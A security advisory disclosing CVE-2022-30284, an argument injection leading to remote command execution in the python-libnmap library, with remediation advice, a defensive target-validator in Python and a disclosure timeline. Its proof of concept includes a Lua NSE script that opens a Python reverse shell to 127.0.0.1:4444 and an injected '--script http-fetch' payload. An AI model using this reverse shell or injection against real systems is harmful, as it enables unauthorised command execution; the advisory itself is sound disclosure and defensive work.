Swascan Offensive Security Team has identified a severe vulnerability in the python-libnmap Python library (https://pypi.org/project/python-libnmap/).
Python-libnmap
Python-libnmap is a Python library, developed by Ronald Bister, that lets Python developers drive nmap processes and work with their output.
The library offers the following features:
- automate or schedule nmap scans on a regular basis
- manipulate nmap scans results to do reporting
- compare and diff nmap scans to generate graphs
- batch process scan reports
- more…
Technical Summary
Swascan Offensive Security Team discovered an important vulnerability in python-libnmap <= 0.7.2.
| Vulnerability | CVSSv3.1 |
| --- | --- |
| python-libnmap <= 0.7.2 – Argument Injection to Remote Command Execution | 9.0 – Critical [AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H] |
The library is vulnerable to an Argument Injection that leads to Remote Command Execution through the Nmap Scripting Engine (NSE).
The Swascan Offensive Security Team recommends that all developers using this Python library check for a fixed version and follow the recommendations reported below, so that the potential risk is mitigated.
Vulnerability details
Critical python-libnmap <=0.7.2 – Argument Injection to Remote Command Execution
CWE-88: Argument Injection
CVSSv3.1: 9.0 [ AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H ]
OWASP: A03:2021 – Injection
Remediation Complexity: HIGH
Description
The library is vulnerable to an Argument Injection that leads to Remote Command Execution.
When the client application fails to validate user input, the library allows arbitrary arguments to be injected into the final nmap command line executed on the underlying operating system. The injected arguments can be used to upload and then execute a custom Lua script through the Nmap Scripting Engine (NSE).
Proof of Concept
When the nmap process is spawned, the quoting of the targets value is not closed correctly, as shown in this PoC:
If the client application does not correctly validate the targets argument value, an attacker can manipulate the nmap command line as shown in the following image:
Remote Code Execution then becomes possible by injecting the http-fetch NSE script to download the following NSE reverse shell script onto the target system, and then injecting it as a script to be run:
-- Runs when nmap loads the script: spawns a Python reverse shell to the listener at 127.0.0.1:4444
local handle = io.popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")
local result = handle:read("*a")
handle:close()
After the NSE reverse shell has been uploaded to the target system, it can be executed:
Impact
When exploited, this vulnerability gives an attacker access to the underlying operating system, and therefore to the client application's data, with the privileges of the user running the application.
Remediation
At the time of writing, no fix is available at the library level, as the developer Ronald Bister has not yet released an update.
Developers using this Python library for nmap network or vulnerability scanning tasks must:
- Update the library as soon as a newer version is released;
- Ensure that the targets argument value, when instantiating the NmapProcess class, is correctly validated and contains only characters that belong to an nmap target specification (in particular no whitespace, quotes or option-like strings).
For a full remediation on the client application side, the targets argument value should be validated as an allowlist against the following use cases:
- FQDNs
- Simple hostnames (possibly stored in /etc/hosts or completed by the domain or search suffix from resolv.conf)
- IPv4 and IPv6 addresses
- IPv4 and IPv6 CIDR notation
- IPv4 octet-range (series) notation (e.g.: 192.138.5.1-5,8,9)
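The following validator is an added example for this advisory and is not python-libnmap's own code. It accepts only the target forms listed above (FQDN, simple hostname, IPv4/IPv6 address, CIDR, IPv4 octet ranges) and rejects anything else, so the value can never contribute extra arguments to the nmap command line. `model_nmap_argv` is a model of the unsafe pattern the advisory describes (a targets string pasted into one command line and split shell-style); it is not the library's implementation. The `NmapProcess(targets=..., options=...)` call shape mentioned in the final comment is an assumption about how the validated list would be used.

```python
"""Allowlist validation for nmap target specifications (added example, not library code)."""
import ipaddress
import re
import shlex

# RFC 1123 label: alphanumerics and hyphens, no leading/trailing hyphen, max 63 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")
# One element of an nmap octet range: "5", "1-5", "1-5,8,9".
_OCTET_ITEM = r"\d{1,3}(?:-\d{1,3})?"
_OCTET_GROUP_RE = re.compile(rf"^{_OCTET_ITEM}(?:,{_OCTET_ITEM})*$")


def _is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def _is_cidr(value: str) -> bool:
    # Require "addr/prefixlen": ipaddress also accepts dotted netmasks, nmap does not.
    addr, sep, prefix = value.partition("/")
    if not sep or not (prefix.isascii() and prefix.isdigit()) or not _is_ip(addr):
        return False
    try:
        ipaddress.ip_network(value, strict=False)  # host bits may be set, as nmap allows
        return True
    except ValueError:
        return False


def _is_ipv4_range(value: str) -> bool:
    # nmap series notation, e.g. 192.138.5.1-5,8,9; every bound must be within 0-255.
    groups = value.split(".")
    if len(groups) != 4:
        return False
    for group in groups:
        if not _OCTET_GROUP_RE.match(group):
            return False
        for item in group.split(","):
            low, _, high = item.partition("-")
            high = high or low
            if not 0 <= int(low) <= int(high) <= 255:
                return False
    return True


def _is_hostname(value: str) -> bool:
    # FQDN or simple hostname; the last label must contain a letter so that a
    # malformed dotted-decimal string (such as an octet of 266) is not accepted as a name.
    if len(value) > 253 or not _HOSTNAME_RE.match(value):
        return False
    return any(c.isalpha() for c in value.rstrip(".").split(".")[-1])


def is_valid_target(value) -> bool:
    """True if value is exactly one target in an allowed form (no whitespace, no options)."""
    if not isinstance(value, str) or not value or any(c.isspace() for c in value):
        return False
    return _is_ip(value) or _is_cidr(value) or _is_ipv4_range(value) or _is_hostname(value)


def validate_targets(targets) -> list:
    """Validate one target or an iterable of targets; raise ValueError on the first bad one."""
    items = [targets] if isinstance(targets, str) else list(targets)
    for item in items:
        if not is_valid_target(item):
            raise ValueError(f"rejected nmap target: {item!r}")
    return items


def model_nmap_argv(targets: str, options: str = "-sT") -> list:
    """Model of the unsafe pattern (not python-libnmap's code): the targets string is
    pasted into one command line and split shell-style, so whitespace in it turns
    into extra nmap arguments."""
    return shlex.split(f"nmap {options} {targets}")


if __name__ == "__main__":
    # Constructed payload in the shape of the PoC: a target followed by an injected option.
    payload = "127.0.0.1 --script http-fetch"
    print(model_nmap_argv(payload))   # '--script' becomes its own argv element
    print(is_valid_target(payload))   # False: whitespace is never part of a single target
    for target in ("scanme.nmap.org", "db01", "10.0.0.0/24", "2001:db8::1", "192.138.5.1-5,8,9"):
        print(target, is_valid_target(target))
    # A validated list can then be passed as targets to NmapProcess(targets=..., options=...)
    # (assumed call shape; each item contains no whitespace, quotes or leading hyphen).
```

Because every accepted value is a single token with no whitespace, quotes or leading hyphen, it stays one target even if the caller later joins it into a command string and re-splits it. The allowlist is deliberately stricter than nmap's full grammar (for example, hostname/CIDR combinations and open-ended octet ranges such as `1-` are not accepted); widen it only for forms the application actually needs.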
Disclosure Timeline
- 14-02-2022: Vulnerability discovered
- 14-02-2022: Developer contacted by email
- 15-02-2022: Report shared with the developer
- 16-02-2022: Developer acknowledged the vulnerability
- 16-02-2022: CVE ID requested
- 25-04-2022: A fix is still not available; the developer agreed to publication
- 05-05-2022: CVE ID CVE-2022-30284 assigned